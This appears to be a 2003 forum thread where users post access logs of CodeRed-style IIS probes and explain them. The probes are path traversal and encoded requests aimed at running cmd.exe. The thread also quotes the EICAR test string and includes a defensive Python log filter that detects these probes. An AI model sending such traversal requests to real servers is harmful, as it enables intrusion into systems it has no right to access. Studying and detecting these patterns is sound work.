uber-l33t h4x0r

Started by UserLoser, September 08, 2003, 07:35 PM

UserLoser

Found this in the log of my webserver running on my computer; I found it funny ;D

12.211.62.105 - - [08/Sep/2003:02:01:56 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:01:57 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:01:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:01:58 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:01:58 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:01:58 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:01:59 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:01:59 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:01:59 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:02:00 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:02:00 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:02:00 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:02:02 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:02:03 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268

Yoni

Looks like a script kiddie scanning for well known IIS holes. I wonder what all those holes are.

Grok

vL.com gets those daily, and many more.

I've seen most of those for 3+ years.

The ..%255c../ looks like it is trying to exploit both the parent-path and the Unicode bypass exploits at the same time.

The MSADC is an exploitable sample site that is installed with IIS4 and IIS5, which allows increased permissions to the attacker.

The rest of it is a lot of pecking around for figuring out your architecture.

UserLoser

Hmm, I'm only on Windows XP Home Edition, and that's an Abyss Web Server.  I don't think by doing that they can confuse the server or get past it or whatever, but I don't know anything about website/server cracking.

iago

I scanned his IP with Thing's scanner, found nothing sadly :(
This'll make an interesting test for broken AV:
Quote: X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*


UserLoser


iago

I only see one IP.. assumed it was his :P


UserLoser

Oh it is his, but I thought since you're a moderator, you could have gotten my IP :P

Thing

Those 14 entries are the signature of a machine infected with CodeRed.  It is trying to infect yours.

$torm made a fine script on one of my boxes which searches the Apache access log and copies CodeRed entries to a text file.  Here is a small portion of that file:
63.225.238.53 - - [08/Sep/2002:00:47:11 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 712
63.225.238.53 - - [08/Sep/2002:00:47:14 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 712
63.225.238.53 - - [08/Sep/2002:00:47:14 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:14 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
That sucking sound you hear is my bandwidth.
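As an added example, not the script $torm wrote for Thing (the thread does not show it): a Python filter that pulls the worm probes Thing describes out of Apache access-log lines and tallies them per source, first decoding the ..%255c.. double encoding and the %c0%af-style sequences Grok mentions so that every variant is matched by the file it asks for rather than by a fixed string. The lax-decoding rule, the function names, and the sample log (probe lines quoted in the thread plus one constructed ordinary request) are this example's own assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Apache common log format as quoted in the thread (protocol optional: Fr0z3N's line has none).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<target>[^"\s]+)(?: [^"\s]+)?" \d{3} \S+')
WORM_FILES = ("cmd.exe", "root.exe")  # a shell, or the root.exe copy of it left behind by Code Red II
OVERLONG = re.compile(rb"[\xc0\xc1].", re.DOTALL)

def decode_request_path(raw):
    """Decode like a lax server: percent-decode twice (%255c -> %5c -> '\\'), then collapse 2-byte overlong
    sequences (%c0%af, %c1%9c). Assumed here: any second byte is accepted, so %c1%1c and %c0%2f decode too."""
    data = raw.encode("latin-1")
    for _ in range(2):
        data = unquote_to_bytes(data)
    data = OVERLONG.sub(lambda m: bytes([((m[0][0] & 0x1F) << 6) | (m[0][1] & 0x3F)]), data)
    return data.decode("latin-1").replace("\\", "/").lower()

def classify(line):
    """Details of a worm-style probe, or None for an ordinary request (or an unparsable line)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("target").partition("?")[0]
    decoded = decode_request_path(path)
    name = decoded.rsplit("/", 1)[-1]
    if name not in WORM_FILES:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"), "file": name, "traversal": "../" in decoded,
            "double_encoded": b"%" in unquote_to_bytes(path)}  # still encoded after one decode pass

def summarize(lines):
    """Per-source tally: probes, files asked for, how many used traversal or double encoding."""
    hosts = defaultdict(lambda: {"probes": 0, "files": set(), "traversal": 0, "double_encoded": 0})
    for hit in filter(None, map(classify, lines)):
        h = hosts[hit["ip"]]
        h["probes"] += 1
        h["files"].add(hit["file"])
        h["traversal"] += hit["traversal"]
        h["double_encoded"] += hit["double_encoded"]
    return dict(hosts)

SAMPLE_LOG = [  # constructed: probe lines quoted in the thread plus one ordinary request
    '12.211.62.105 - - [08/Sep/2003:02:01:56 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 266',
    '12.211.62.105 - - [08/Sep/2003:02:01:58 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268',
    '12.211.62.105 - - [08/Sep/2003:02:02:00 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266',
    '63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 712',
    '134.202.1.149 - - [10/Sep/2003:21:23:44 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -',
    '10.0.0.7 - - [08/Sep/2003:02:05:00 -0500] "GET /index.html HTTP/1.0" 200 1234',
]
```

Matching on the decoded file name rather than on one encoded string is what makes the 14 variants on the page collapse into a single rule; `summarize(SAMPLE_LOG)` is the per-host version of the text file Thing describes.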

UserLoser

Nobody infects my computer!

Fr0z3N

134.202.1.149 - - [10/Sep/2003:21:23:44 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -

Only one I saw. But I'm too lazy to look through them all.

On Apache, Thing wanna send me that file by $torm? :D

Thing

Quote: On Apache, Thing wanna send me that file by $torm?
You should ask him.  He wrote it.

Fr0z3N

Where would I see him to ask?

Thing
